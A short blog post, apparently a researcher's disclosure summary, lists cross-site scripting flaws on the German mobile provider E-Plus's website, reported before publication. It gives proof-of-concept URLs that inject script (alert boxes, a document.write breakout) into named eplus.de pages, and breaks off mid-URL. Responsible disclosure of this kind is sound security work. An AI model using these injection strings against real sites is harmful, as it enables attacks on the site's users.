Note: This is just a short form of a german article I posted today. E-Plus is a big german mobile telephony provider. I've found a bunch of XSS together with Alexander Brachmann (responsible disclosure, all reported to E-Plus before, probably more to come). For my english visitors, here are the urls: http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort=">alert(1) http://www.eplus.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write(' http://www.eplus.de/frame.asp?go=');a More

1 Flattr microdonation